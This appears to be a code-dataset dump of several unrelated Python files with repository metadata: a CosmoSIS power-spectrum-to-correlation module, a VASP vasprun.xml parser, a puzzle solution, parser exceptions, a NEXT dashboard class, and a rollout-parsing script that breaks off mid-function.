ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra
|
07e5d308c6a8641a369a3e0b8d13c4104988cd2b
|
[
"BSD-2-Clause"
] | 1
|
2021-06-11T15:29:43.000Z
|
2021-06-11T15:29:43.000Z
|
#coding: utf-8
#import cl_to_xi_full
from __future__ import print_function
from builtins import range
import numpy as np
from cosmosis.datablock import option_section, names as section_names
from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp
from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
def setup(options):
if options.has_value(option_section, "theta"):
theta = options[option_section, 'theta']
if np.isscalar(theta):
theta = np.array([theta])
theta = arcmin_to_radians(theta)
else:
n_theta = options[option_section, "n_theta"]
theta_min = options[option_section, "theta_min"]
theta_max = options[option_section, "theta_max"]
theta_min = arcmin_to_radians(theta_min)
theta_max = arcmin_to_radians(theta_max)
theta = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta)
corr_type = options.get_int(option_section, 'corr_type')
ell_max = options.get_int(option_section, "ell_max")
cl_section = options.get_string(option_section, "input_section_name", "")
output_section = options.get_string(
option_section, "output_section_name", "")
# setup precompute functions and I/O sections
if corr_type == 0:
precomp_func = precomp_GpGm
cl_to_xi_func = save_xi_22
if not cl_section:
cl_section = "shear_cl"
if not output_section:
output_section = "shear_xi"
elif corr_type == 1:
precomp_func = get_legfactors_00
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_cl"
if not output_section:
output_section = "galaxy_xi"
elif corr_type == 2:
precomp_func = get_legfactors_02
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_shear_cl"
if not output_section:
output_section = "galaxy_shear_xi"
else:
print("corr_type should be 0 (for spin 2 autocorrelations e.g. xi+/-(theta)),")
print("1 (for scalar autocorrelations e.g. w(theta) or 2")
print("for spin 0 x spin 2 correlations e.g. gamma_t(theta)")
raise ValueError()
legfacs = precomp_func(np.arange(ell_max + 1), theta)
return theta, ell_max, legfacs, cl_to_xi_func, cl_section, output_section
def execute(block, config):
thetas, ell_max, legfacs, cl_to_xi_func, cl_section, output_section = config
n_theta = len(thetas)
ell = block[cl_section, "ell"]
nbina, nbinb = block[cl_section, 'nbin_a'], block[cl_section, 'nbin_b']
block[output_section, "nbin_a"] = nbina
block[output_section, "nbin_b"] = nbinb
block[output_section, "theta"] = thetas
#block.put_metadata(output_section, "theta", "unit", "radians")
for i in range(1, nbina + 1):
for j in range(1, nbinb + 1):
name = 'bin_%d_%d' % (i, j)
if block.has_value(cl_section, name):
c_ell = block[cl_section, name]
else:
continue
cl_interp = SpectrumInterp(ell, c_ell)
cl_to_xi_func(block, output_section, i, j,
cl_interp, thetas, legfacs)
return 0
def cleanup(config):
# nothing to do here! We just include this
# for completeness. The joy of python.
return 0
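# Sketch of the theta grid that setup() builds when no explicit "theta" option is given
# (example values only; arcmin_to_radians is the helper imported from cl_to_xi above):
#
#     theta_min_rad = arcmin_to_radians(1.0)     # theta_min in arcmin
#     theta_max_rad = arcmin_to_radians(300.0)   # theta_max in arcmin
#     theta = np.logspace(np.log10(theta_min_rad), np.log10(theta_max_rad), 20)  # n_theta bins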
| 36.138298
| 87
| 0.657345
| 480
| 3,397
| 4.325
| 0.25625
| 0.093931
| 0.023121
| 0.028902
| 0.22736
| 0.202312
| 0.148844
| 0.148844
| 0.090559
| 0.090559
| 0
| 0.017689
| 0.251104
| 3,397
| 93
| 88
| 36.526882
| 0.798349
| 0.064469
| 0
| 0.178082
| 0
| 0
| 0.114754
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.082192
| 0.013699
| 0.164384
| 0.054795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb11bba5257814c53fdaf00b36feffb7caef7ad
| 22,329
|
py
|
Python
|
aiida_vasp/parsers/content_parsers/vasprun.py
|
DropD/aiida_vasp
|
9967f5501a6fc1c67981154068135cec7be5396a
|
[
"MIT"
] | 3
|
2016-11-18T07:19:57.000Z
|
2016-11-28T08:28:38.000Z
|
aiida_vasp/parsers/content_parsers/vasprun.py
|
DropD/aiida_vasp
|
9967f5501a6fc1c67981154068135cec7be5396a
|
[
"MIT"
] | null | null | null |
aiida_vasp/parsers/content_parsers/vasprun.py
|
DropD/aiida_vasp
|
9967f5501a6fc1c67981154068135cec7be5396a
|
[
"MIT"
] | null | null | null |
"""
The vasprun.xml parser interface.
---------------------------------
Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content.
"""
# pylint: disable=abstract-method, too-many-public-methods
import numpy as np
from parsevasp.vasprun import Xml
from parsevasp import constants as parsevaspct
from aiida_vasp.parsers.content_parsers.base import BaseFileParser
from aiida_vasp.utils.compare_bands import get_band_properties
class VasprunParser(BaseFileParser):
"""The parser interface that enables parsing of ``vasprun.xml`` content.
The parser is triggered by using the keys listed in ``PARSABLE_QUANTITIES``.
"""
OPEN_MODE = 'rb'
DEFAULT_SETTINGS = {
'quantities_to_parse': [
'structure',
'eigenvalues',
'dos',
'kpoints',
'occupancies',
'trajectory',
'energies',
'projectors',
'dielectrics',
'born_charges',
'hessian',
'dynmat',
'forces',
'stress',
'total_energies',
'maximum_force',
'maximum_stress',
'band_properties',
'version',
],
'energy_type': ['energy_extrapolated'],
'electronic_step_energies': False
}
PARSABLE_QUANTITIES = {
'structure': {
'inputs': [],
'name': 'structure',
'prerequisites': [],
'alternatives': ['poscar-structure']
},
'eigenvalues': {
'inputs': [],
'name': 'eigenvalues',
'prerequisites': [],
'alternatives': ['eigenval-eigenvalues']
},
'dos': {
'inputs': [],
'name': 'dos',
'prerequisites': [],
'alternatives': ['doscar-dos']
},
'kpoints': {
'inputs': [],
'name': 'kpoints',
'prerequisites': [],
'alternatives': ['kpoints-kpoints']
},
'occupancies': {
'inputs': [],
'name': 'occupancies',
'prerequisites': [],
},
'trajectory': {
'inputs': [],
'name': 'trajectory',
'prerequisites': [],
},
'energies': {
'inputs': [],
'name': 'energies',
'prerequisites': [],
},
'total_energies': {
'inputs': [],
'name': 'total_energies',
'prerequisites': [],
},
'projectors': {
'inputs': [],
'name': 'projectors',
'prerequisites': [],
},
'dielectrics': {
'inputs': [],
'name': 'dielectrics',
'prerequisites': [],
},
'stress': {
'inputs': [],
'name': 'stress',
'prerequisites': [],
},
'forces': {
'inputs': [],
'name': 'forces',
'prerequisites': [],
},
'born_charges': {
'inputs': [],
'name': 'born_charges',
'prerequisites': [],
},
'hessian': {
'inputs': [],
'name': 'hessian',
'prerequisites': [],
},
'dynmat': {
'inputs': [],
'name': 'dynmat',
'prerequisites': [],
},
'fermi_level': {
'inputs': [],
'name': 'fermi_level',
'prerequisites': [],
},
'maximum_force': {
'inputs': [],
'name': 'maximum_force',
'prerequisites': []
},
'maximum_stress': {
'inputs': [],
'name': 'maximum_stress',
'prerequisites': []
},
'band_properties': {
'inputs': [],
'name': 'band_properties',
'prerequisites': [],
},
'version': {
'inputs': [],
'name': 'version',
'prerequisites': [],
}
}
# Mapping of the energy names to those returned by parsevasp.vasprun.Xml
ENERGY_MAPPING = {
'energy_extrapolated': 'energy_extrapolated_final',
'energy_free': 'energy_free_final',
'energy_no_entropy': 'energy_no_entropy_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
ENERGY_MAPPING_VASP5 = {
'energy_extrapolated': 'energy_no_entropy_final',
'energy_free': 'energy_free_final',
# Note that the parsed energy_extrapolated_final is the entropy term
'energy_no_entropy': 'energy_extrapolated_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
def _init_from_handler(self, handler):
"""Initialize using a file like handler."""
try:
self._content_parser = Xml(file_handler=handler, k_before_band=True, logger=self._logger)
except SystemExit:
self._logger.warning('Parsevasp exited abnormally.')
@property
def version(self):
"""Fetch the VASP version from ``parsevasp`` and return it as a string object."""
# fetch version
version = self._content_parser.get_version()
if version is None:
return None
return version
@property
def eigenvalues(self):
"""Fetch eigenvalues."""
# Fetch eigenvalues
eigenvalues = self._content_parser.get_eigenvalues()
if eigenvalues is None:
return None
return eigenvalues
@property
def occupancies(self):
"""Fetch occupancies."""
# Fetch occupancies
occupancies = self._content_parser.get_occupancies()
if occupancies is None:
# occupancies not present, should not really happen?
return None
return occupancies
@property
def kpoints(self):
"""Fetch the kpoints an prepare for consumption by the NodeComposer."""
kpts = self._content_parser.get_kpoints()
kptsw = self._content_parser.get_kpointsw()
# k-points in XML is always in reciprocal if spacing methods have been used
# but what about explicit/regular
cartesian = False
kpoints_data = None
if (kpts is not None) and (kptsw is not None):
# Create a dictionary and store k-points that can be consumed by the NodeComposer
kpoints_data = {}
kpoints_data['mode'] = 'explicit'
kpoints_data['cartesian'] = cartesian
kpoints_data['points'] = kpts
kpoints_data['weights'] = kptsw
return kpoints_data
@property
def structure(self):
"""
Fetch a given structure.
Which structure to fetch is controlled by inputs.
eFL: Need to clean this so that we can set different
structures to pull from the outside. Could be useful not
pulling the whole trajectory.
Currently defaults to the last structure.
"""
return self.last_structure
@property
def last_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step.
"""
last_lattice = self._content_parser.get_lattice('last')
if last_lattice is None:
return None
return _build_structure(last_lattice)
@property
def final_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step. Should in
principle be the same as the method above.
"""
return self.last_structure
@property
def last_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
force = self._content_parser.get_forces('last')
return force
@property
def final_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
return self.last_forces
@property
def forces(self):
"""
Fetch forces.
This container should contain all relevant forces.
Currently, it only contains the final forces, which can be obtained
by the id `final_forces`.
"""
final_forces = self.final_forces
forces = {'final': final_forces}
return forces
@property
def maximum_force(self):
"""Fetch the maximum force of at the last ionic run."""
forces = self.final_forces
if forces is None:
return None
norm = np.linalg.norm(forces, axis=1)
return np.amax(np.abs(norm))
@property
def last_stress(self):
"""
Fetch stress.
After or at the last recorded ionic step.
"""
stress = self._content_parser.get_stress('last')
return stress
@property
def final_stress(self):
"""
Fetch stress.
After or at the last recorded ionic step.
"""
return self.last_stress
@property
def stress(self):
"""
Fetch stress.
This container should contain all relevant stress.
Currently, it only contains the final stress, which can be obtained
by the id `final_stress`.
"""
final_stress = self.final_stress
stress = {'final': final_stress}
return stress
@property
def maximum_stress(self):
"""Fetch the maximum stress of at the last ionic run."""
stress = self.final_stress
if stress is None:
return None
norm = np.linalg.norm(stress, axis=1)
return np.amax(np.abs(norm))
@property
def trajectory(self):
"""
Fetch unitcells, positions, species, forces and stress.
For all calculation steps.
"""
unitcell = self._content_parser.get_unitcell('all')
positions = self._content_parser.get_positions('all')
species = self._content_parser.get_species()
forces = self._content_parser.get_forces('all')
stress = self._content_parser.get_stress('all')
# make sure all are sorted, first to last calculation
# (species is constant)
unitcell = sorted(unitcell.items())
positions = sorted(positions.items())
forces = sorted(forces.items())
stress = sorted(stress.items())
# convert to numpy
unitcell = np.asarray([item[1] for item in unitcell])
positions = np.asarray([item[1] for item in positions])
forces = np.asarray([item[1] for item in forces])
stress = np.asarray([item[1] for item in stress])
# Aiida wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
symbols = np.asarray([elements[item].title() for item in species.tolist()])
if (unitcell is not None) and (positions is not None) and \
(species is not None) and (forces is not None) and \
(stress is not None):
trajectory_data = {}
keys = ('cells', 'positions', 'symbols', 'forces', 'stress', 'steps')
stepids = np.arange(unitcell.shape[0])
for key, data in zip(keys, (unitcell, positions, symbols, forces, stress, stepids)):
trajectory_data[key] = data
return trajectory_data
return None
@property
def total_energies(self):
"""Fetch the total energies after the last ionic run."""
energies = self.energies
if energies is None:
return None
energies_dict = {}
for etype in self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type']):
energies_dict[etype] = energies[etype][-1]
# Also return the raw electronic steps energy
energies_dict[etype + '_electronic'] = energies[etype + '_electronic'][-1]
return energies_dict
@property
def energies(self):
"""Fetch the total energies."""
# Check if we want total energy entries for each electronic step.
electronic_step_energies = self._settings.get('electronic_step_energies', self.DEFAULT_SETTINGS['electronic_step_energies'])
return self._energies(nosc=not electronic_step_energies)
def _energies(self, nosc):
"""
Fetch the total energies for all energy types, calculations (ionic steps) and electronic steps.
The returned dict from the parser contains the total energy types as a key (plus the _final, which is
the final total energy ejected by VASP after the closure of the electronic steps). The energies can then
be found in the flattened ndarray where the key `electronic_steps` indicate how many electronic steps
there is per ionic step. Using the combination, one can rebuild the electronic step energy per ionic step etc.
Because the VASPrun parser returns both the electronic step energies (at the end of each cycle) and the ionic step
energies (_final), we apply a mapping to recover the naming such that the ionic step energies do not have the suffix,
but the electronic step energies do.
"""
etype = self._settings.get('energy_type', self.DEFAULT_SETTINGS['energy_type'])
# Create a copy
etype = list(etype)
etype_orig = list(etype)
# Apply mapping and request the correct energies from the parsing results
# VASP 5 has a bug where the energy_no_entropy is not included in the XML output - we have to calculate it here
if self.version.startswith('5'):
# For VASP 5, energy_no_entropy needs to be calculated here
if 'energy_no_entropy' in etype_orig:
etype.append('energy_free')
etype.append('energy_extrapolated')
# energy extrapolated is stored as energy_no_entropy for the ionic steps
if 'energy_extrapolated' in etype_orig:
etype.append('energy_no_entropy')
# Remove duplicates
etype = list(set(etype))
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
# Here we must calculate the true `energy_no_entropy`
if 'energy_no_entropy' in etype_orig:
# The energy_extrapolated_final is the entropy term itself in VASP 5
# Store the calculated energy_no_entropy under 'energy_extrapolated_final',
# which is then recovered as `energy_no_entropy` later
energies['energy_extrapolated_final'] = energies['energy_free_final'] - energies['energy_extrapolated_final']
else:
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
if energies is None:
return None
# Apply mapping - those with `_final` has the suffix removed and those without has `_electronic` added
mapped_energies = {}
mapping = self.ENERGY_MAPPING_VASP5 if self.version.startswith('5') else self.ENERGY_MAPPING
# Reverse the mapping - now key is the name of the original energies output
revmapping = {value: key for key, value in mapping.items()}
for key, value in energies.items():
# Apply mapping if needed
if key in revmapping:
if revmapping[key].replace('_electronic', '') in etype_orig:
mapped_energies[revmapping[key]] = value
else:
mapped_energies[key] = value
return mapped_energies
@property
def projectors(self):
"""Fetch the projectors."""
proj = self._content_parser.get_projectors()
if proj is None:
return None
projectors = {}
prj = []
try:
prj.append(proj['total']) # pylint: disable=unsubscriptable-object
except KeyError:
try:
prj.append(proj['up']) # pylint: disable=unsubscriptable-object
prj.append(proj['down']) # pylint: disable=unsubscriptable-object
except KeyError:
self._logger.error('Did not detect any projectors. Returning.')
if len(prj) == 1:
projectors['projectors'] = prj[0]
else:
projectors['projectors'] = np.asarray(prj)
return projectors
@property
def dielectrics(self):
"""Fetch the dielectric function."""
diel = self._content_parser.get_dielectrics()
if diel is None:
return None
dielectrics = {}
energy = diel.get('energy')
idiel = diel.get('imag')
rdiel = diel.get('real')
epsilon = diel.get('epsilon')
epsilon_ion = diel.get('epsilon_ion')
if energy is not None:
dielectrics['ediel'] = energy
if idiel is not None:
dielectrics['rdiel'] = rdiel
if rdiel is not None:
dielectrics['idiel'] = idiel
if epsilon is not None:
dielectrics['epsilon'] = epsilon
if epsilon_ion is not None:
dielectrics['epsilon_ion'] = epsilon_ion
return dielectrics
@property
def born_charges(self):
"""Fetch the Born effective charges."""
brn = self._content_parser.get_born()
if brn is None:
return None
born = {'born_charges': brn}
return born
@property
def hessian(self):
"""Fetch the Hessian matrix."""
hessian = self._content_parser.get_hessian()
if hessian is None:
return None
hess = {'hessian': hessian}
return hess
@property
def dynmat(self):
"""Fetch the dynamical eigenvectors and eigenvalues."""
dynmat = self._content_parser.get_dynmat()
if dynmat is None:
return None
dyn = {}
dyn['dynvec'] = dynmat['eigenvectors'] # pylint: disable=unsubscriptable-object
dyn['dyneig'] = dynmat['eigenvalues'] # pylint: disable=unsubscriptable-object
return dyn
@property
def dos(self):
"""Fetch the total density of states."""
dos = self._content_parser.get_dos()
if dos is None:
return None
densta = {}
# energy is always there, regardless of
# total, spin or partial
energy = dos['total']['energy'] # pylint: disable=unsubscriptable-object
densta['energy'] = energy
tdos = None
pdos = None
upspin = dos.get('up')
downspin = dos.get('down')
total = dos.get('total')
if (upspin is not None) and (downspin is not None):
tdos = np.stack((upspin['total'], downspin['total']))
if (upspin['partial'] is not None) and \
(downspin['partial'] is not None):
pdos = np.stack((upspin['partial'], downspin['partial']))
else:
tdos = total['total']
pdos = total['partial']
densta['tdos'] = tdos
if pdos is not None:
densta['pdos'] = pdos
return densta
@property
def fermi_level(self):
"""Fetch Fermi level."""
return self._content_parser.get_fermi_level()
@property
def run_status(self):
"""Fetch run_status information"""
info = {}
# First check electronic convergence by comparing executed steps to the
# maximum allowed number of steps (NELM).
energies = self._content_parser.get_energies('last', nosc=False)
parameters = self._content_parser.get_parameters()
info['finished'] = not self._content_parser.truncated
# Only set to true for untruncated run to avoid false positives
if energies is None:
info['electronic_converged'] = False
elif energies.get('electronic_steps')[0] < parameters['nelm'] and not self._content_parser.truncated:
info['electronic_converged'] = True
else:
info['electronic_converged'] = False
# Then check the ionic convergence by comparing executed steps to the
# maximum allowed number of steps (NSW).
energies = self._content_parser.get_energies('all', nosc=True)
if energies is None:
info['ionic_converged'] = False
else:
if len(energies.get('electronic_steps')) < parameters['nsw'] and not self._content_parser.truncated:
info['ionic_converged'] = True
else:
info['ionic_converged'] = False
# Override if nsw is 0 - no ionic steps are performed
if parameters['nsw'] < 1:
info['ionic_converged'] = None
return info
@property
def band_properties(self):
"""Fetch key properties of the electronic structure."""
eigenvalues = self.eigenvalues
occupancies = self.occupancies
if eigenvalues is None:
return None
# Convert dict to index in numpy array
if 'total' in eigenvalues:
eig = np.array(eigenvalues['total'])
occ = np.array(occupancies['total'])
else:
eig = np.array([eigenvalues['up'], eigenvalues['down']])
occ = np.array([occupancies['up'], occupancies['down']])
return get_band_properties(eig, occ)
def _build_structure(lattice):
"""Builds a structure according to AiiDA spec."""
structure_dict = {}
structure_dict['unitcell'] = lattice['unitcell']
structure_dict['sites'] = []
# AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
for pos, specie in zip(lattice['positions'], lattice['species']):
site = {}
site['position'] = np.dot(pos, lattice['unitcell'])
site['symbol'] = elements[specie].title()
site['kind_name'] = elements[specie].title()
structure_dict['sites'].append(site)
return structure_dict
def _invert_dict(dct):
return dct.__class__(map(reversed, dct.items()))
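# Small illustration of the inversion helper above (made-up mapping, not the parsevasp table):
#
#     >>> _invert_dict({'H': 1, 'He': 2})
#     {1: 'H', 2: 'He'}
#
# The parsers use this to turn parsevasp's element table back into number -> symbol lookups.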
| 31.898571
| 132
| 0.578261
| 2,355
| 22,329
| 5.343524
| 0.167728
| 0.02535
| 0.039177
| 0.039733
| 0.207088
| 0.179832
| 0.125238
| 0.101716
| 0.089558
| 0.089558
| 0
| 0.001314
| 0.318151
| 22,329
| 699
| 133
| 31.944206
| 0.825222
| 0.22894
| 0
| 0.278761
| 0
| 0
| 0.161119
| 0.022793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068584
| false
| 0
| 0.011062
| 0.002212
| 0.19469
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb3ccf7fca90c61707cbd90f3475846779b54b9
| 341
|
py
|
Python
|
clash-of-code/shortest/number_categories.py
|
jonasnic/codingame
|
f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721
|
[
"MIT"
] | 30
|
2016-04-30T01:56:05.000Z
|
2022-03-09T22:19:12.000Z
|
clash-of-code/shortest/number_categories.py
|
jonasnic/codingame
|
f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721
|
[
"MIT"
] | 1
|
2021-05-19T19:36:45.000Z
|
2021-05-19T19:36:45.000Z
|
clash-of-code/shortest/number_categories.py
|
jonasnic/codingame
|
f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721
|
[
"MIT"
] | 17
|
2020-01-28T13:54:06.000Z
|
2022-03-26T09:49:27.000Z
|
from collections import defaultdict

c=defaultdict(set)
f=lambda:[int(i) for i in input().split()]
a,b=f()
s,e=f()
for i in range(s,e+1):
    x=i%a==0
    y=i%b==0
    if x and y:
        c[3].add(i)
    elif x and not y:
        c[1].add(i)
    elif y and not x:
        c[2].add(i)
    else:
        c[4].add(i)
o=[]
for i in range(1,5):
    o.append(str(len(c[i])))
print(' '.join(o))
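# Worked example (illustrative input, not from the original file): with a=2, b=3 and the
# range 1..10, the buckets are {2, 4, 8, 10} (only a), {3, 9} (only b), {6} (both) and
# {1, 5, 7} (neither), so the program prints "4 2 1 3".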
| 17.05
| 42
| 0.58651
| 84
| 341
| 2.380952
| 0.464286
| 0.08
| 0.09
| 0.11
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.031915
| 0.173021
| 341
| 20
| 43
| 17.05
| 0.677305
| 0
| 0
| 0
| 0
| 0
| 0.002924
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.05
| 0.05
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb5e0196946388daa9f3a5d9e0cb39eba4f8a0c
| 520
|
py
|
Python
|
interpreter/src/parser/errors.py
|
Cdayz/simple_lang
|
dc19d6ef76bb69c87981c8b826cf8f71b0cc475b
|
[
"MIT"
] | 3
|
2019-08-22T01:20:16.000Z
|
2021-02-05T09:11:50.000Z
|
interpreter/src/parser/errors.py
|
Cdayz/simple_lang
|
dc19d6ef76bb69c87981c8b826cf8f71b0cc475b
|
[
"MIT"
] | null | null | null |
interpreter/src/parser/errors.py
|
Cdayz/simple_lang
|
dc19d6ef76bb69c87981c8b826cf8f71b0cc475b
|
[
"MIT"
] | 2
|
2019-08-22T01:20:18.000Z
|
2021-05-27T14:40:12.000Z
|
"""Module with useful exceptions for Parser."""
class BadOperationIdentifier(Exception):
"""Bad operation identifier used."""
class BadOperationArgument(Exception):
"""Bad argument provided to operation."""
class BadInPlaceValue(Exception):
"""Bad in-place value provided as argument."""
class ParsingError(Exception):
"""Parsing error."""
def __init__(self, line_index, line, exception):
self.line_index = line_index
self.line_code = line
self.exception = exception
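# Usage sketch (the operation name and line below are hypothetical):
#
#     try:
#         raise BadOperationIdentifier("unknown operation 'frobnicate'")
#     except BadOperationIdentifier as exc:
#         raise ParsingError(line_index=3, line="frobnicate x y", exception=exc)
#
# ParsingError carries the offending line number, its source text and the original exception.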
| 22.608696
| 52
| 0.696154
| 55
| 520
| 6.436364
| 0.563636
| 0.101695
| 0.073446
| 0.096045
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188462
| 520
| 22
| 53
| 23.636364
| 0.838863
| 0.315385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0
| 0
| 0.625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb78ad70383d16f179dd4a23ab825be06e844e6
| 1,919
|
py
|
Python
|
apps/DuelingBanditsPureExploration/dashboard/Dashboard.py
|
erinzm/NEXT-chemistry
|
d6ca0a80640937b36f9cafb5ead371e7a8677734
|
[
"Apache-2.0"
] | 155
|
2015-11-01T17:48:41.000Z
|
2022-02-06T21:37:41.000Z
|
apps/DuelingBanditsPureExploration/dashboard/Dashboard.py
|
erinzm/NEXT-chemistry
|
d6ca0a80640937b36f9cafb5ead371e7a8677734
|
[
"Apache-2.0"
] | 193
|
2015-09-29T21:40:31.000Z
|
2020-04-21T15:09:13.000Z
|
apps/DuelingBanditsPureExploration/dashboard/Dashboard.py
|
erinzm/NEXT-chemistry
|
d6ca0a80640937b36f9cafb5ead371e7a8677734
|
[
"Apache-2.0"
] | 54
|
2015-09-30T15:51:05.000Z
|
2022-02-13T05:26:20.000Z
|
import json
import next.utils as utils
from next.apps.AppDashboard import AppDashboard


class MyAppDashboard(AppDashboard):

    def __init__(self,db,ell):
        AppDashboard.__init__(self,db,ell)

    def most_current_ranking(self,app, butler, alg_label):
        """
        Description: Returns a ranking of arms in the form of a list of dictionaries, which is convenient for downstream applications

        Expected input:
          (string) alg_label : must be a valid alg_label contained in alg_list list of dicts

        The 'headers' contains a list of dictionaries corresponding to each column of the table with fields 'label' and 'field'
        where 'label' is the label of the column to be put on top of the table, and 'field' is the name of the field in 'data' that the column corresponds to

        Expected output (in dict):
          plot_type : 'columnar_table'
          headers : [ {'label':'Rank','field':'rank'}, {'label':'Target','field':'index'} ]
          (list of dicts with fields) data (each dict is a row, each field is the column for that row):
            (int) index : index of target
            (int) ranking : rank (0 to number of targets - 1) representing belief of being best arm
        """
        item = app.getModel(json.dumps({'exp_uid':app.exp_uid, 'args': {'alg_label':alg_label}}))
        return_dict = {}
        return_dict['headers'] = [{'label':'Rank','field':'rank'},
                                  {'label':'Target','field':'index'},
                                  {'label':'Score','field':'score'},
                                  {'label':'Precision','field':'precision'}]
        for target in item['targets']:
            for key in ['score', 'precision']:
                target[key] = '{:0.5f}'.format(target[key])
        return_dict['data'] = item['targets']
        return_dict['plot_type'] = 'columnar_table'
        return return_dict
| 47.975
| 158
| 0.604482
| 246
| 1,919
| 4.605691
| 0.390244
| 0.035305
| 0.017652
| 0.022948
| 0.125331
| 0.0812
| 0.0812
| 0.0812
| 0.0812
| 0
| 0
| 0.002882
| 0.276707
| 1,919
| 39
| 159
| 49.205128
| 0.813401
| 0.45284
| 0
| 0
| 0
| 0
| 0.186441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.157895
| 0
| 0.368421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fc3fd1b7cba71af7933022261d214435bda9000
| 2,786
|
py
|
Python
|
results/baseline/parse_rollout.py
|
XiaoSanchez/autophase
|
3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb
|
[
"BSD-3-Clause"
] | 14
|
2020-04-03T12:41:50.000Z
|
2022-02-04T00:05:01.000Z
|
results/baseline/parse_rollout.py
|
XiaoSanchez/autophase
|
3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb
|
[
"BSD-3-Clause"
] | 2
|
2020-03-02T04:32:58.000Z
|
2021-09-15T20:02:25.000Z
|
results/baseline/parse_rollout.py
|
XiaoSanchez/autophase
|
3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb
|
[
"BSD-3-Clause"
] | 8
|
2020-03-02T10:30:36.000Z
|
2021-08-03T02:29:38.000Z
|
import pickle
import sys

import numpy as np


def geomean(iterable):
    a = np.array(iterable).astype(float)
    prod = a.prod()
    prod = -prod if prod < 0 else prod
    return prod**(1.0/len(a))


# Define the valid programs here
def is_valid_pgm(pgm):
    pgms = ['471', '4926', '12092', '3449', '4567', '16510', '6118', '15427', '112', '15801', '3229', '12471', '3271', '16599', '11090', '16470', '10308', '9724', '8971', '15292', '15117', '6827', '9381', '18028', '4278', '16971', '1985', '12721', '16698', '7246', '1335', '7923', '13570', '11580', '16010', '10492', '10396', '13085', '17532', '14602', '16879', '8518', '1546', '12204', '15008', '5381']
    for ref_pgm in pgms:
        if pgm == ref_pgm:
            return True
    return False


def parse_rollout(baseline_fn="baseline.txt", rollout_fn="ppo_results_orig_norm_24pass_random_log.csv"):
    pgms = []
    results = {}
    total_count = 0
    total_rl_cycle = []
    with open(rollout_fn) as f:
        lines = f.readlines()
        for line in lines:
            data = line.split(',')
            pgm = data[0] + '.c'
            cycle = int(data[1].replace('\n',''))
            #if cycle < 20000 and cycle > 1000:
            #if cycle < 10000000 and is_valid_pgm(data[0]):
            if cycle < 10000000:
                cycles = [cycle]
                results[pgm] = cycles
                total_count += 1
                total_rl_cycle.append(cycle)
                pgms.append(data[0])
    better_count = 0
    equal_count = 0
    total_o3_cycle = []
    with open(baseline_fn) as f:
        lines = f.readlines()
        lines = lines[1:]
        for line in lines:
            data = line.split('|')
            if data[0] in results.keys():
                cycle = int(data[2])
                results[data[0]].append(cycle)
                total_o3_cycle.append(cycle)
                #if cycle == 10000000:
                #    print(data[0])
                #    raise
                if cycle > results[data[0]][0]:
                    better_count += 1
                if cycle == results[data[0]][0]:
                    equal_count += 1
    print(results)
    print("total_count: {}".format(total_count))
